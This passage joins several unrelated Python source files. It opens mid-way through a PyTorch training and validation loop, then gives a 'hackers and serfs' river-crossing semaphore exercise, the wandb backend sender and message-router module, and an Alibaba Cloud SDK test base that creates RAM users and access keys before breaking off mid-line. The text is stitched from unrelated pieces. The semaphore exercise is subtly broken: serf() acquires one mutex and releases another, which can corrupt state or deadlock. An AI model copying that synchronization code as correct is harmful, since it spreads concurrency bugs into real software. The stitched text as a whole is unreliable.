run[f"network_ADAM/matrix/train_confusion_matrix_pr_file"].log( t_mat) Accuarcy_upload(run, t_mat, total_pos, total_neg, "network_ADAM", "train") v_mat = torch.zeros(2,2) total_pos, total_neg = torch.tensor(0), torch.tensor(0) for series in val_loader: ind, tar, chan = series y_pred = model(ind) pred = y_pred.transpose(1, 2).reshape(-1, 2).type(fl) target = tar.view(-1).type(it) loss = lossFunc(pred, target) valid_loss.append(loss.item()) acc, mat, tot_p_g, tot_n_g = Accuarcy_find(y_pred, tar, device) valid_acc = torch.cat((valid_acc, acc.view(1))) v_mat = v_mat + mat total_pos = total_pos + tot_p_g total_neg = total_neg + tot_n_g run[f"network_ADAM/validation_loss_pr_file"].log( np.mean(np.array(valid_loss))) sm_loss = np.mean(np.array(valid_loss)) * smooth \ + (1-smooth) * smooth_train_loss[-1] smooth_train_loss.append(sm_loss) run[f"network_ADAM/smooth_val_loss_pr_file"].log(sm_loss) valid_loss = [] run[f"network_ADAM/val_acc_pr_file"].log(torch.mean(valid_acc)) valid_acc = torch.tensor([]).to(device) run[f"network_ADAM/matrix/val_confusion_matrix_pr_file"].log(v_mat) Accuarcy_upload(run, v_mat, total_pos, total_neg, "network_ADAM", "val") scheduler.step() run.stop() def net_starter(nets, device, fl, it, train_path, val_path): for net in nets: pr1 = mp.Process(target=net, args = (device, fl, it, train_path, val_path,)) pr1.start() pr1.join() if __name__ == '__main__': device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) if device == "cpu": fl = torch.FloatTensor it = torch.LongTensor else: fl = torch.cuda.FloatTensor it = torch.cuda.LongTensor core = torch.cuda.device_count() #core = 1 #networks = [net_ADAM1] # net_SGD2, net_ADAM2, net_SGD1, networks = [net_SGD1, net_ADAM1, net_SGD2, net_ADAM2] cuda_dict = dict() # cuda_dict[core] = networks for i in range(core): cuda_dict[i] = [] for i in range(len(networks)): cuda_dict[i % core].append(networks[i]) # i % core #"/home/tyson/model_data/train_model_data" # "C:/Users/Marc/Desktop/model_data/train_model_data" train_path = "/home/tyson/data_cutoff/train_model_data" val_path = "/home/tyson/data_cutoff/val_model_data" pres = [] for i in range(core): pres.append(mp.Process(target=net_starter, args = (cuda_dict.get(i), f"cuda:{i}", fl, it, train_path, val_path,))) for process in pres: process.start() for process in pres: process.join()
cruceDelRio.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# River-crossing synchronization exercise: hackers and serfs board a raft of four.
import threading
import time
import random

umbral_balsa = 4
serfs = 0
hackers = 0

sem_balsa = threading.Semaphore(4)
mutex_hackers = threading.Semaphore(1)
barrera_hackers = threading.Semaphore(0)
mutex_serfs = threading.Semaphore(1)


def serf(yo):
    global serfs
    while True:
        mutex_serfs.acquire()
        serfs += 1
        if (serfs == 4):
            sem_balsa.release()
        elif (serfs == 2 and hackers == 2):
            sem_balsa.release()
        mutex_hackers.release()
        barrera_hackers.acquire()
        print("Serf %d boarded the raft" % serfs)


def hacker(yo):
    global hackers
    while True:
        mutex_hackers.acquire()
        hackers += 1
        if (hackers == 4):
            sem_balsa.release()
            for i in range(umbral_balsa):
                barrera_hackers.release()
        mutex_hackers.release()
        barrera_hackers.acquire()
        print("Hacker %d boarded the raft" % hackers)


def balsa():
    global hackers
    global serfs
    while True:
        sem_balsa.acquire()
        mutex_hackers.acquire()
        mutex_serfs.acquire()
        if (hackers == 4):
            print("Raft leaving with %d hackers" % umbral_balsa)
            hackers -= 4
        elif (serfs == 4):
            print("Raft leaving with %d serfs" % umbral_balsa)
            serfs -= umbral_balsa
        elif (serfs == 2 and hackers == 2):
            print("Raft leaving with 2 serfs and 2 hackers")
            serfs -= 2
            hackers -= 2
        else:
            print("Raft waiting....")
        mutex_hackers.release()
        mutex_serfs.release()


threading.Thread(target=balsa, args=[]).start()
for i in range(10):
    threading.Thread(target=serf, args=[i]).start()
for i in range(10):
    threading.Thread(target=hacker, args=[i]).start()
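A minimal sketch of the gate pattern that barrera_hackers is meant to implement above: a Semaphore initialized to 0 blocks a group of threads, and whoever completes the group releases it once per waiting thread so the whole group proceeds together. The names here (gate, passenger, group_size) are illustrative only.

import threading

gate = threading.Semaphore(0)
group_size = 4

def passenger(i):
    gate.acquire()               # wait until the whole group may board
    print("passenger %d boards" % i)

threads = [threading.Thread(target=passenger, args=(i,)) for i in range(group_size)]
for t in threads:
    t.start()
for _ in range(group_size):      # the "captain" opens the gate once per passenger
    gate.release()
for t in threads:
    t.join()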
interface.py
# # -*- coding: utf-8 -*- """Backend Sender - Send to internal process Manage backend sender. """ import json import logging import threading import uuid import six from six.moves import queue import wandb from wandb import data_types from wandb.proto import wandb_internal_pb2 as pb from wandb.proto import wandb_telemetry_pb2 as tpb from wandb.util import ( get_h5_typename, json_dumps_safer, json_dumps_safer_history, json_friendly, json_friendly_val, maybe_compress_summary, WandBJSONEncoderOld, ) from .artifacts import ArtifactManifest from ..wandb_artifacts import Artifact if wandb.TYPE_CHECKING: import typing as t from . import summary_record as sr from typing import Any, Dict, Iterable, Optional, Tuple, Union from multiprocessing import Process from typing import cast from typing import TYPE_CHECKING if TYPE_CHECKING: from ..wandb_run import Run from six.moves.queue import Queue else: def cast(_, val): return val logger = logging.getLogger("wandb") def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue": if policy == "now": enum = pb.FilesItem.PolicyType.NOW elif policy == "end": enum = pb.FilesItem.PolicyType.END elif policy == "live": enum = pb.FilesItem.PolicyType.LIVE return enum def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str: if enum == pb.FilesItem.PolicyType.NOW: policy = "now" elif enum == pb.FilesItem.PolicyType.END: policy = "end" elif enum == pb.FilesItem.PolicyType.LIVE: policy = "live" return policy class _Future(object): _object: Optional[pb.Result] def __init__(self) -> None: self._object = None self._object_ready = threading.Event() self._lock = threading.Lock() def get(self, timeout: int = None) -> Optional[pb.Result]: is_set = self._object_ready.wait(timeout) if is_set and self._object: return self._object return None def _set_object(self, obj: pb.Result) -> None: self._object = obj self._object_ready.set() class MessageRouter(object): _pending_reqs: Dict[str, _Future] _request_queue: "Queue[pb.Record]" _response_queue: "Queue[pb.Result]" def __init__( self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]" ) -> None: self._request_queue = request_queue self._response_queue = response_queue self._pending_reqs = {} self._lock = threading.Lock() self._join_event = threading.Event() self._thread = threading.Thread(target=self.message_loop) self._thread.daemon = True self._thread.start() def message_loop(self) -> None: while not self._join_event.is_set(): try: msg = self._response_queue.get(timeout=1) except queue.Empty: continue self._handle_msg_rcv(msg) def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future: rec.control.req_resp = True if local: rec.control.local = local rec.uuid = uuid.uuid4().hex future = _Future() with self._lock: self._pending_reqs[rec.uuid] = future self._request_queue.put(rec) return future def join(self) -> None: self._join_event.set() self._thread.join() def _handle_msg_rcv(self, msg: pb.Result) -> None: with self._lock: future = self._pending_reqs.pop(msg.uuid, None) if future is None: # TODO (cvp): saw this in tests, seemed benign enough to ignore, but # could point to other issues. 
if msg.uuid != "": logger.warning( "No listener found for msg with uuid %s (%s)", msg.uuid, msg ) return future._set_object(msg) class BackendSender(object): class ExceptionTimeout(Exception): pass record_q: Optional["Queue[pb.Record]"] result_q: Optional["Queue[pb.Result]"] process: Optional[Process] _run: Optional["Run"] _router: Optional[MessageRouter] def __init__( self, record_q: "Queue[pb.Record]" = None, result_q: "Queue[pb.Result]" = None, process: Process = None, ) -> None: self.record_q = record_q self.result_q = result_q self._process = process self._run = None self._router = None if record_q and result_q: self._router = MessageRouter(record_q, result_q) def _hack_set_run(self, run: "Run") -> None: self._run = run def publish_output(self, name: str, data: str) -> None: # from vendor.protobuf import google3.protobuf.timestamp # ts = timestamp.Timestamp() # ts.GetCurrentTime() # now = datetime.now() if name == "stdout": otype = pb.OutputRecord.OutputType.STDOUT elif name == "stderr": otype = pb.OutputRecord.OutputType.STDERR else: # TODO(jhr): throw error? print("unknown type") o = pb.OutputRecord(output_type=otype, line=data) o.timestamp.GetCurrentTime() self._publish_output(o) def _publish_output(self, outdata: pb.OutputRecord) -> None: rec = pb.Record() rec.output.CopyFrom(outdata) self._publish(rec) def publish_tbdata( self, log_dir: str, save: bool, root_logdir: Optional[str] ) -> None: tbrecord = pb.TBRecord() tbrecord.log_dir = log_dir tbrecord.save = save tbrecord.root_dir = root_logdir or "" rec = self._make_record(tbrecord=tbrecord) self._publish(rec) def _publish_history(self, history: pb.HistoryRecord) -> None: rec = self._make_record(history=history) self._publish(rec) def publish_history( self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True ) -> None: run = run or self._run data = data_types.history_dict_to_json(run, data, step=step) history = pb.HistoryRecord() if publish_step: assert step is not None history.step.num = step data.pop("_step", None) for k, v in six.iteritems(data): item = history.item.add() item.key = k item.value_json = json_dumps_safer_history(v) # type: ignore self._publish_history(history) def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None: rec = self._make_record(telemetry=telem) self._publish(rec) def _make_run(self, run: "Run") -> pb.RunRecord: proto_run = pb.RunRecord() run._make_proto_run(proto_run) if run._settings.host: proto_run.host = run._settings.host if run._config is not None: config_dict = run._config._as_dict() # type: ignore self._make_config(data=config_dict, obj=proto_run.config) if run._telemetry_obj: proto_run.telemetry.MergeFrom(run._telemetry_obj) return proto_run def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord: proto_artifact = pb.ArtifactRecord() proto_artifact.type = artifact.type proto_artifact.name = artifact.name proto_artifact.digest = artifact.digest if artifact.distributed_id: proto_artifact.distributed_id = artifact.distributed_id if artifact.description: proto_artifact.description = artifact.description if artifact.metadata: proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore proto_artifact.incremental_beta1 = artifact.incremental self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest) return proto_artifact def _make_artifact_manifest( self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None ) -> pb.ArtifactManifest: proto_manifest = obj or pb.ArtifactManifest() 
proto_manifest.version = artifact_manifest.version() # type: ignore proto_manifest.storage_policy = artifact_manifest.storage_policy.name() for k, v in artifact_manifest.storage_policy.config().items() or {}.items(): cfg = proto_manifest.storage_policy_config.add() cfg.key = k cfg.value_json = json.dumps(v) for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore proto_entry = proto_manifest.contents.add() proto_entry.path = entry.path proto_entry.digest = entry.digest if entry.size: proto_entry.size = entry.size if entry.birth_artifact_id: proto_entry.birth_artifact_id = entry.birth_artifact_id if entry.ref: proto_entry.ref = entry.ref if entry.local_path: proto_entry.local_path = entry.local_path for k, v in entry.extra.items(): proto_extra = proto_entry.extra.add() proto_extra.key = k proto_extra.value_json = json.dumps(v) return proto_manifest def _make_exit(self, exit_code: int) -> pb.RunExitRecord: exit = pb.RunExitRecord() exit.exit_code = exit_code return exit def _make_config( self, data: dict = None, key: Union[Tuple[str, ...], str] = None, val: Any = None, obj: pb.ConfigRecord = None, ) -> pb.ConfigRecord: config = obj or pb.ConfigRecord() if data: for k, v in six.iteritems(data): update = config.update.add() update.key = k update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore if key: update = config.update.add() if isinstance(key, tuple): for k in key: update.nested_key.append(k) else: update.key = key update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore return config def _make_stats(self, stats_dict: dict) -> pb.StatsRecord: stats = pb.StatsRecord() stats.stats_type = pb.StatsRecord.StatsType.SYSTEM stats.timestamp.GetCurrentTime() for k, v in six.iteritems(stats_dict): item = stats.item.add() item.key = k item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore return stats def _summary_encode(self, value: t.Any, path_from_root: str) -> dict: """Normalize, compress, and encode sub-objects for backend storage. value: Object to encode. path_from_root: `str` dot separated string from the top-level summary to the current `value`. Returns: A new tree of dict's with large objects replaced with dictionaries with "_type" entries that say which type the original data was. """ # Constructs a new `dict` tree in `json_value` that discards and/or # encodes objects that aren't JSON serializable. if isinstance(value, dict): json_value = {} for key, value in six.iteritems(value): json_value[key] = self._summary_encode( value, path_from_root + "." 
+ key ) return json_value else: friendly_value, converted = json_friendly( # type: ignore data_types.val_to_json( self._run, path_from_root, value, namespace="summary" ) ) json_value, compressed = maybe_compress_summary( # type: ignore friendly_value, get_h5_typename(value) # type: ignore ) if compressed: # TODO(jhr): impleement me pass # self.write_h5(path_from_root, friendly_value) return json_value def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord: summary = pb.SummaryRecord() for k, v in six.iteritems(summary_dict): update = summary.update.add() update.key = k update.value_json = json.dumps(v) return summary def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord: pb_summary_record = pb.SummaryRecord() for item in summary_record.update: pb_summary_item = pb_summary_record.update.add() key_length = len(item.key) assert key_length > 0 if key_length > 1: pb_summary_item.nested_key.extend(item.key) else: pb_summary_item.key = item.key[0] path_from_root = ".".join(item.key) json_value = self._summary_encode(item.value, path_from_root) json_value, _ = json_friendly(json_value) # type: ignore pb_summary_item.value_json = json.dumps( json_value, cls=WandBJSONEncoderOld, ) for item in summary_record.remove: pb_summary_item = pb_summary_record.remove.add() key_length = len(item.key) assert key_length > 0 if key_length > 1: pb_summary_item.nested_key.extend(item.key) else: pb_summary_item.key = item.key[0] return pb_summary_record def _make_files(self, files_dict: dict) -> pb.FilesRecord: files = pb.FilesRecord() for path, policy in files_dict["files"]: f = files.files.add() f.path = path f.policy = file_policy_to_enum(policy) return files def _make_login(self, api_key: str = None) -> pb.LoginRequest: login = pb.LoginRequest() if api_key: login.api_key = api_key return login def _make_request( self, login: pb.LoginRequest = None, get_summary: pb.GetSummaryRequest = None, pause: pb.PauseRequest = None, resume: pb.ResumeRequest = None, stop_status: pb.StopStatusRequest = None, network_status: pb.NetworkStatusRequest = None, poll_exit: pb.PollExitRequest = None, sampled_history: pb.SampledHistoryRequest = None, run_start: pb.RunStartRequest = None, check_version: pb.CheckVersionRequest = None, log_artifact: pb.LogArtifactRequest = None, defer: pb.DeferRequest = None, ) -> pb.Record: request = pb.Request() if login: request.login.CopyFrom(login) elif get_summary: request.get_summary.CopyFrom(get_summary) elif pause: request.pause.CopyFrom(pause) elif resume: request.resume.CopyFrom(resume) elif stop_status: request.stop_status.CopyFrom(stop_status) elif network_status: request.network_status.CopyFrom(network_status) elif poll_exit: request.poll_exit.CopyFrom(poll_exit) elif sampled_history: request.sampled_history.CopyFrom(sampled_history) elif run_start: request.run_start.CopyFrom(run_start) elif check_version: request.check_version.CopyFrom(check_version) elif log_artifact: request.log_artifact.CopyFrom(log_artifact) elif defer: request.defer.CopyFrom(defer) else: raise Exception("Invalid request") record = self._make_record(request=request) # All requests do not get persisted record.control.local = True return record def _make_record( self, run: pb.RunRecord = None, config: pb.ConfigRecord = None, files: pb.FilesRecord = None, summary: pb.SummaryRecord = None, history: pb.HistoryRecord = None, stats: pb.StatsRecord = None, exit: pb.RunExitRecord = None, artifact: pb.ArtifactRecord = None, tbrecord: pb.TBRecord = None, alert: pb.AlertRecord = None, 
final: pb.FinalRecord = None, metric: pb.MetricRecord = None, header: pb.HeaderRecord = None, footer: pb.FooterRecord = None, request: pb.Request = None, telemetry: tpb.TelemetryRecord = None, ) -> pb.Record: record = pb.Record() if run: record.run.CopyFrom(run) elif config: record.config.CopyFrom(config) elif summary: record.summary.CopyFrom(summary) elif history: record.history.CopyFrom(history) elif files: record.files.CopyFrom(files) elif stats: record.stats.CopyFrom(stats) elif exit: record.exit.CopyFrom(exit) elif artifact: record.artifact.CopyFrom(artifact) elif tbrecord: record.tbrecord.CopyFrom(tbrecord) elif alert: record.alert.CopyFrom(alert) elif final: record.final.CopyFrom(final) elif header: record.header.CopyFrom(header) elif footer: record.footer.CopyFrom(footer) elif request: record.request.CopyFrom(request) elif telemetry: record.telemetry.CopyFrom(telemetry) elif metric: record.metric.CopyFrom(metric) else: raise Exception("Invalid record") return record def _publish(self, record: pb.Record, local: bool = None) -> None: if self._process and not self._process.is_alive(): raise Exception("The wandb backend process has shutdown") if local: record.control.local = local if self.record_q: self.record_q.put(record) def _communicate( self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None ) -> Optional[pb.Result]: return self._communicate_async(rec, local=local).get(timeout=timeout) def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future: assert self._router future = self._router.send_and_receive(rec, local=local) return future def communicate_login( self, api_key: str = None, timeout: Optional[int] = 15 ) -> pb.LoginResponse: login = self._make_login(api_key) rec = self._make_request(login=login) result = self._communicate(rec, timeout=timeout) if result is None: # TODO: friendlier error message here raise wandb.Error( "Couldn't communicate with backend after %s seconds" % timeout ) login_response = result.response.login_response assert login_response return login_response def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None: defer = pb.DeferRequest(state=state) rec = self._make_request(defer=defer) self._publish(rec, local=True) def publish_defer(self, state: int = 0) -> None: self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state)) def publish_header(self) -> None: header = pb.HeaderRecord() rec = self._make_record(header=header) self._publish(rec) def publish_footer(self) -> None: footer = pb.FooterRecord() rec = self._make_record(footer=footer) self._publish(rec) def publish_final(self) -> None: final = pb.FinalRecord() rec = self._make_record(final=final) self._publish(rec) def publish_login(self, api_key: str = None) -> None: login = self._make_login(api_key) rec = self._make_request(login=login) self._publish(rec) def publish_pause(self) -> None: pause = pb.PauseRequest() rec = self._make_request(pause=pause) self._publish(rec) def publish_resume(self) -> None: resume = pb.ResumeRequest() rec = self._make_request(resume=resume) self._publish(rec) def _publish_run(self, run: pb.RunRecord) -> None: rec = self._make_record(run=run) self._publish(rec) def publish_run(self, run_obj: "Run") -> None: run = self._make_run(run_obj) self._publish_run(run) def publish_config( self, data: dict = None, key: Union[Tuple[str, ...], str] = None, val: Any = None, ) -> None: cfg = self._make_config(data=data, key=key, val=val) self._publish_config(cfg) def _publish_config(self, cfg: pb.ConfigRecord) -> None: rec = 
self._make_record(config=cfg) self._publish(rec) def publish_summary(self, summary_record: sr.SummaryRecord) -> None: pb_summary_record = self._make_summary(summary_record) self._publish_summary(pb_summary_record) def _publish_summary(self, summary: pb.SummaryRecord) -> None: rec = self._make_record(summary=summary) self._publish(rec) def _publish_metric(self, metric: pb.MetricRecord) -> None: rec = self._make_record(metric=metric) self._publish(rec) def _communicate_run( self, run: pb.RunRecord, timeout: int = None ) -> Optional[pb.RunUpdateResult]: """Send synchronous run object waiting for a response. Arguments: run: RunRecord object timeout: number of seconds to wait Returns: RunRecord object """ req = self._make_record(run=run) resp = self._communicate(req, timeout=timeout) if resp is None: logger.info("couldn't get run from backend") # Note: timeouts handled by callers: wandb_init.py return None assert resp.HasField("run_result") return resp.run_result def communicate_run( self, run_obj: "Run", timeout: int = None ) -> Optional[pb.RunUpdateResult]: run = self._make_run(run_obj) return self._communicate_run(run, timeout=timeout) def publish_stats(self, stats_dict: dict) -> None: stats = self._make_stats(stats_dict) rec = self._make_record(stats=stats) self._publish(rec) def publish_files(self, files_dict: dict) -> None: files = self._make_files(files_dict) rec = self._make_record(files=files) self._publish(rec) def communicate_artifact( self, run: "Run", artifact: Artifact, aliases: Iterable[str], is_user_created: bool = False, use_after_commit: bool = False, finalize: bool = True, ) -> _Future: proto_run = self._make_run(run) proto_artifact = self._make_artifact(artifact) proto_artifact.run_id = proto_run.run_id proto_artifact.project = proto_run.project proto_artifact.entity = proto_run.entity proto_artifact.user_created = is_user_created proto_artifact.use_after_commit = use_after_commit proto_artifact.finalize = finalize for alias in aliases: proto_artifact.aliases.append(alias) log_artifact = pb.LogArtifactRequest() log_artifact.artifact.CopyFrom(proto_artifact) rec = self._make_request(log_artifact=log_artifact) return self._communicate_async(rec) def publish_artifact( self, run: "Run", artifact: Artifact, aliases: Iterable[str], is_user_created: bool = False, use_after_commit: bool = False, finalize: bool = True, ) -> None: proto_run = self._make_run(run) proto_artifact = self._make_artifact(artifact) proto_artifact.run_id = proto_run.run_id proto_artifact.project = proto_run.project proto_artifact.entity = proto_run.entity proto_artifact.user_created = is_user_created proto_artifact.use_after_commit = use_after_commit proto_artifact.finalize = finalize for alias in aliases: proto_artifact.aliases.append(alias) rec = self._make_record(artifact=proto_artifact) self._publish(rec) def publish_alert( self, title: str, text: str, level: str, wait_duration: int ) -> None: proto_alert = pb.AlertRecord() proto_alert.title = title proto_alert.text = text proto_alert.level = level proto_alert.wait_duration = wait_duration rec = self._make_record(alert=proto_alert) self._publish(rec) def communicate_stop_status( self, timeout: int = None ) -> Optional[pb.StopStatusResponse]: status = pb.StopStatusRequest() req = self._make_request(stop_status=status) resp = self._communicate(req, timeout=timeout, local=True) if resp is None: return None assert resp.response.stop_status_response return resp.response.stop_status_response def communicate_network_status( self, timeout: int = None ) -> 
Optional[pb.NetworkStatusResponse]: status = pb.NetworkStatusRequest() req = self._make_request(network_status=status) resp = self._communicate(req, timeout=timeout, local=True) if resp is None: return None assert resp.response.network_status_response return resp.response.network_status_response def publish_exit(self, exit_code: int) -> None: exit_data = self._make_exit(exit_code) rec = self._make_record(exit=exit_data) self._publish(rec) def _communicate_exit( self, exit_data: pb.RunExitRecord, timeout: int = None ) -> pb.RunExitResult: req = self._make_record(exit=exit_data) result = self._communicate(req, timeout=timeout) if result is None: # TODO: friendlier error message here raise wandb.Error( "Couldn't communicate with backend after %s seconds" % timeout ) assert result.exit_result return result.exit_result def communicate_poll_exit( self, timeout: int = None ) -> Optional[pb.PollExitResponse]: poll_request = pb.PollExitRequest() rec = self._make_request(poll_exit=poll_request) result = self._communicate(rec, timeout=timeout) if result is None: return None poll_exit_response = result.response.poll_exit_response assert poll_exit_response return poll_exit_response def communicate_check_version( self, current_version: str = None ) -> Optional[pb.CheckVersionResponse]: check_version = pb.CheckVersionRequest() if current_version: check_version.current_version = current_version rec = self._make_request(check_version=check_version) result = self._communicate(rec) if result is None: # Note: timeouts handled by callers: wandb_init.py return None return result.response.check_version_response def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]: run_start = pb.RunStartRequest() run_start.run.CopyFrom(run_pb) rec = self._make_request(run_start=run_start) result = self._communicate(rec) return result def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult: exit_data = self._make_exit(exit_code) return self._communicate_exit(exit_data, timeout=timeout) def communicate_summary(self) -> Optional[pb.GetSummaryResponse]: record = self._make_request(get_summary=pb.GetSummaryRequest()) result = self._communicate(record, timeout=10) if result is None: return None get_summary_response = result.response.get_summary_response assert get_summary_response return get_summary_response def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]: record = self._make_request(sampled_history=pb.SampledHistoryRequest()) result = self._communicate(record) if result is None: return None sampled_history_response = result.response.sampled_history_response assert sampled_history_response return sampled_history_response def join(self) -> None: # shutdown request = pb.Request(shutdown=pb.ShutdownRequest()) record = self._make_record(request=request) _ = self._communicate(record) if self._router: self._router.join()
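The MessageRouter above pairs each outgoing Record with a _Future keyed by a uuid and resolves it from a background thread reading the response queue. A small self-contained sketch of that request/response pattern, with hypothetical names (MiniRouter, a toy echo backend) and plain dicts standing in for _Future and the protobuf records:

import queue
import threading
import uuid

class MiniRouter:
    def __init__(self, request_q, response_q):
        self._request_q, self._response_q = request_q, response_q
        self._pending = {}
        self._lock = threading.Lock()
        threading.Thread(target=self._loop, daemon=True).start()

    def send_and_receive(self, payload):
        msg_id = uuid.uuid4().hex
        fut = {"event": threading.Event(), "result": None}
        with self._lock:
            self._pending[msg_id] = fut          # park a future until the reply arrives
        self._request_q.put((msg_id, payload))
        return fut

    def _loop(self):
        while True:
            msg_id, result = self._response_q.get()
            with self._lock:
                fut = self._pending.pop(msg_id, None)
            if fut is not None:
                fut["result"] = result
                fut["event"].set()               # resolve the matching future

# toy "backend": answers every request with its payload upper-cased
req_q, resp_q = queue.Queue(), queue.Queue()
def backend():
    while True:
        msg_id, payload = req_q.get()
        resp_q.put((msg_id, payload.upper()))
threading.Thread(target=backend, daemon=True).start()

router = MiniRouter(req_q, resp_q)
fut = router.send_and_receive("hello")
fut["event"].wait(timeout=5)
print(fut["result"])   # "HELLO"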
base.py
# Copyright 2018 Alibaba Cloud Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os.path import json import os import threading import logging import time import sys from aliyunsdkcore.client import AcsClient from aliyunsdkcore.vendored.six import iteritems from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkram.request.v20150501.ListUsersRequest import ListUsersRequest from aliyunsdkram.request.v20150501.CreateUserRequest import CreateUserRequest from aliyunsdkram.request.v20150501.CreateAccessKeyRequest import CreateAccessKeyRequest from aliyunsdkram.request.v20150501.DeleteAccessKeyRequest import DeleteAccessKeyRequest from aliyunsdkram.request.v20150501.ListAccessKeysRequest import ListAccessKeysRequest from aliyunsdkram.request.v20150501.ListRolesRequest import ListRolesRequest from aliyunsdkram.request.v20150501.CreateRoleRequest import CreateRoleRequest from aliyunsdkram.request.v20150501.DeleteRoleRequest import DeleteRoleRequest from aliyunsdkram.request.v20150501.AttachPolicyToUserRequest import AttachPolicyToUserRequest # The unittest module got a significant overhaul # in 2.7, so if we're in 2.6 we can use the backported # version unittest2. if sys.version_info[:2] == (2, 6): from unittest2 import TestCase else: from unittest import TestCase # the version under py3 use the different package if sys.version_info[0] == 3: from http.server import SimpleHTTPRequestHandler from http.server import HTTPServer else: from SimpleHTTPServer import SimpleHTTPRequestHandler from BaseHTTPServer import HTTPServer def request_helper(client, request, **params): for key, value in iteritems(params): set_name = 'set_' + key if hasattr(request, set_name): func = getattr(request, set_name) func(value) else: raise Exception( "{0} has no parameter named {1}.".format(request.__class__.__name__, key)) response = client.do_action_with_exception(request) return json.loads(response.decode('utf-8')) def _check_server_response(obj, key): if key not in obj: raise Exception("No '{0}' in server response.".format(key)) def find_in_response(response, key=None, keys=None): if key: _check_server_response(response, key) return response[key] if keys: obj = response for key in keys: _check_server_response(obj, key) obj = obj[key] return obj class SDKTestBase(TestCase): def __init__(self, *args, **kwargs): TestCase.__init__(self, *args, **kwargs) # if sys.version_info[0] == 2: # self.assertRegex = self.assertRegexpMatches self._init_env() def test_env_available(self): # To let test script know whether env is available, to continue the tests self._init_env() def _init_env(self): self._sdk_config = self._init_sdk_config() self.access_key_id = self._read_key_from_env_or_config("ACCESS_KEY_ID") self.access_key_secret = self._read_key_from_env_or_config("ACCESS_KEY_SECRET") self.region_id = self._read_key_from_env_or_config("REGION_ID") self.user_id = self._read_key_from_env_or_config("USER_ID") self.root_user_id = self._read_key_from_env_or_config("ROOT_UID") if 
'TRAVIS_JOB_NUMBER' in os.environ: self.travis_concurrent = os.environ.get('TRAVIS_JOB_NUMBER').split(".")[-1] else: self.travis_concurrent = "0" self.default_ram_user_name = "RamUserForSDKCredentialsTest" + self.travis_concurrent self.default_ram_role_name = "RamROleForSDKTest" + self.travis_concurrent self.default_role_session_name = "RoleSession" + self.travis_concurrent self.ram_user_id = None self.ram_policy_attched = False self.ram_user_access_key_id = None self.ram_user_access_key_secret = None self.ram_role_arn = None def _init_sdk_config(self): sdk_config_path = os.path.join(os.path.expanduser("~"), "aliyun_sdk_config.json") if os.path.isfile(sdk_config_path): with open(sdk_config_path) as fp: return json.loads(fp.read()) def _read_key_from_env_or_config(self, key_name): if key_name.upper() in os.environ: return os.environ.get(key_name.upper()) if key_name.lower() in self._sdk_config: return self._sdk_config[key_name.lower()] raise Exception("Failed to find sdk config: " + key_name) def setUp(self): TestCase.setUp(self) self.client = self.init_client() def tearDown(self): pass def init_client(self, region_id=None): if not region_id: region_id = self.region_id client = AcsClient(self.access_key_id, self.access_key_secret, region_id, timeout=120) client.set_stream_logger() return client @staticmethod def get_dict_response(string): return json.loads(string.decode('utf-8'), encoding="utf-8") def _create_default_ram_user(self): if self.ram_user_id: return response = request_helper(self.client, ListUsersRequest()) user_list = find_in_response(response, keys=['Users', 'User']) for user in user_list: if user['UserName'] == self.default_ram_user_name: self.ram_user_id = user["UserId"] return response = request_helper(self.client, CreateUserRequest(), UserName=self.default_ram_user_name) self.ram_user_id = find_in_response(response, keys=['User', 'UserId']) def _attach_default_policy(self): if self.ram_policy_attched: return try: request_helper(self.client, AttachPolicyToUserRequest(), PolicyType='System', PolicyName='AliyunSTSAssumeRoleAccess', UserName=self.default_ram_user_name) except ServerException as e: if e.get_error_code() == 'EntityAlreadyExists.User.Policy': pass else: raise e self.ram_policy_attched = True def _create_access_key(self): if self.ram_user_access_key_id and self.ram_user_access_key_secret: return response = request_helper(self.client, ListAccessKeysRequest(), UserName=self.default_ram_user_name) for access_key in find_in_response(response, keys=['AccessKeys', 'AccessKey']): access_key_id = access_key['AccessKeyId'] request_helper(self.client, DeleteAccessKeyRequest(), UserAccessKeyId=access_key_id, UserName=self.default_ram_user_name) response = request_helper(self.client, CreateAccessKeyRequest(), UserName=self.default_ram_user_name) self.ram_user_access_key_id = find_in_response(response, keys=['AccessKey', 'AccessKeyId']) self.ram_user_access_key_secret = find_in_response( response, keys=['AccessKey', 'AccessKeySecret']) def _delete_access_key(self): request_helper(self.client, DeleteAccessKeyRequest(), UserName=self.default_ram_user_name, UserAccessKeyId=self.ram_user_access_key_id) def init_sub_client(self): self._create_default_ram_user() self._attach_default_policy() self._create_access_key() client = AcsClient(self.ram_user_access_key_id, self.ram_user_access_key_secret, self.region_id, timeout=120) return client def _create_default_ram_role(self): if self.ram_role_arn: return response = request_helper(self.client, ListRolesRequest()) for role in 
